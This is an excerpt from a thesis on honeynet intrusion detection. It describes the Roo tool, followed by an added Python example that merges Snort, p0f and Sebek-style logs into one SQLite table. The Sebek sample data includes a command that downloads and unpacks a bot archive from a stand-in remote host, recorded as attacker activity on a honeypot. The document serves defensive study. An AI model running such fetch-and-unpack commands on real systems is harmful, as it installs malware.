Jan Gerrit Göbel- Advanced Honeynet Based Intrusion Detection

Published by: White909 on Dec 01, 2011
Copyright:Attribution Non-commercial

As described in the previous chapter, various distinct tools, such as Snort, Sebek and p0f,
are used to accumulate information from the Honeynet. Because these tools are usually not
designed to interact with each other, each of them produces its collected data in a different,
mutually incompatible output format. In case of a successful compromise of a Honeypot, gathering
all the data related to the incident therefore takes a lot of time and effort: one has to
parse all logfiles manually and extract the related information in order to get a
comprehensive overview of what happened. Roo is able to collect all this information
from the individual sources and process it in an automated manner. The combined
data is then stored in a single centralized database for further investigation, e.g. with
the help of the web interface Walleye. Thus it is possible to easily view attack patterns
or even complete process trees of the actions taken on Honeypots which are currently under
the control of an attacker. Roo is available at the Honeynet Project homepage and is under
constant development [Pro05c].
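The following script is an added illustration of the consolidation step described above; it is not code from Roo, Walleye or the thesis. It parses constructed Snort fast-alert lines, p0f fingerprint lines and simplified Sebek-style keystroke records into one SQLite table with a common schema, so that a single query yields the incident overview for a honeypot that would otherwise require reading three logfiles by hand. The Snort and p0f line layouts follow the tools' human-readable output only loosely, the Sebek record shape is invented for the example, and all sample values are constructed.

```python
"""Consolidate heterogeneous honeynet sensor output into one event table.

Added example, not Roo/Honeywall code. The sensor line formats are
approximations of Snort 'fast' alerts and p0f output; the Sebek record
is a simplified (honeypot_ip, pid, command) tuple, not Sebek's real
on-the-wire format.
"""
import re
import sqlite3

# Constructed sample output, one entry per sensor record.
SNORT_ALERTS = [
    "03/14-10:02:11.123456  [**] [1:2001219:1] ET SCAN SSH BruteForce [**] "
    "[Priority: 2] {TCP} 198.51.100.7:51234 -> 10.0.0.5:22",
    "03/14-10:05:40.000001  [**] [1:1000001:1] LOCAL outbound IRC [**] "
    "[Priority: 1] {TCP} 10.0.0.5:40112 -> 203.0.113.9:6667",
]
P0F_LINES = [
    "198.51.100.7:51234 - Linux 2.6 (newer) -> 10.0.0.5:22 (distance 14, link: ethernet/modem)",
]
SEBEK_RECORDS = [  # (honeypot_ip, pid, command) - constructed, simplified
    ("10.0.0.5", 4321, "wget http://203.0.113.9/bot.tgz"),
    ("10.0.0.5", 4322, "tar xzf bot.tgz"),
]

SNORT_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<sid>[\d:]+)\]\s+(?P<msg>.*?)\s+\[\*\*\].*?"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)
P0F_RE = re.compile(
    r"^(?P<src>[\d.]+):(?P<sport>\d+)\s+-\s+(?P<os>.*?)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)"
)

# One schema for every sensor: who, whom, and a sensor-specific detail string.
SCHEMA = """
CREATE TABLE IF NOT EXISTS events (
    id      INTEGER PRIMARY KEY,
    sensor  TEXT NOT NULL,   -- snort | p0f | sebek
    src_ip  TEXT,            -- originating host, NULL if the sensor has no network view
    dst_ip  TEXT,            -- honeypot or destination host
    detail  TEXT NOT NULL    -- sensor-specific description
)
"""


def parse_snort(line):
    """Snort fast-alert line -> normalized event dict, or None if it does not match."""
    m = SNORT_RE.match(line)
    if m is None:
        return None
    return {"sensor": "snort", "src_ip": m["src"], "dst_ip": m["dst"],
            "detail": f"{m['msg']} ({m['proto']} {m['sport']}->{m['dport']}, sid {m['sid']})"}


def parse_p0f(line):
    """p0f fingerprint line -> normalized event dict, or None if it does not match."""
    m = P0F_RE.match(line)
    if m is None:
        return None
    return {"sensor": "p0f", "src_ip": m["src"], "dst_ip": m["dst"],
            "detail": f"fingerprint: {m['os']}"}


def parse_sebek(record):
    """Keystroke record captured on the honeypot itself; it has no remote source IP."""
    honeypot_ip, pid, command = record
    return {"sensor": "sebek", "src_ip": None, "dst_ip": honeypot_ip,
            "detail": f"pid {pid}: {command}"}


def build_database(snort_lines, p0f_lines, sebek_records):
    """Parse every source and load the normalized events into one in-memory SQLite table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    events = []
    for line in snort_lines:
        ev = parse_snort(line)
        if ev is not None:
            events.append(ev)
    for line in p0f_lines:
        ev = parse_p0f(line)
        if ev is not None:
            events.append(ev)
    events.extend(parse_sebek(rec) for rec in sebek_records)
    conn.executemany(
        "INSERT INTO events (sensor, src_ip, dst_ip, detail) "
        "VALUES (:sensor, :src_ip, :dst_ip, :detail)", events)
    conn.commit()
    return conn


def incident_overview(conn, honeypot_ip):
    """Everything any sensor recorded about one honeypot, in arrival order."""
    return conn.execute(
        "SELECT sensor, src_ip, detail FROM events "
        "WHERE src_ip = ? OR dst_ip = ? ORDER BY id",
        (honeypot_ip, honeypot_ip)).fetchall()


def attacker_ips(conn, honeypot_ip):
    """Remote hosts that the network sensors saw contacting the honeypot."""
    rows = conn.execute(
        "SELECT DISTINCT src_ip FROM events WHERE dst_ip = ? AND src_ip IS NOT NULL",
        (honeypot_ip,)).fetchall()
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    db = build_database(SNORT_ALERTS, P0F_LINES, SEBEK_RECORDS)
    print("attackers:", attacker_ips(db, "10.0.0.5"))
    for sensor, src, detail in incident_overview(db, "10.0.0.5"):
        print(f"[{sensor:5}] {src or '-':15} {detail}")
```

The point of the common `events` table is that the inbound scan alert, the OS fingerprint of the scanning host, the keystrokes typed on the compromised honeypot and the outbound IRC alert all line up in one timeline without any manual cross-referencing of logfiles; a web front end such as Walleye can then be built over such a table rather than over each sensor's raw output.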
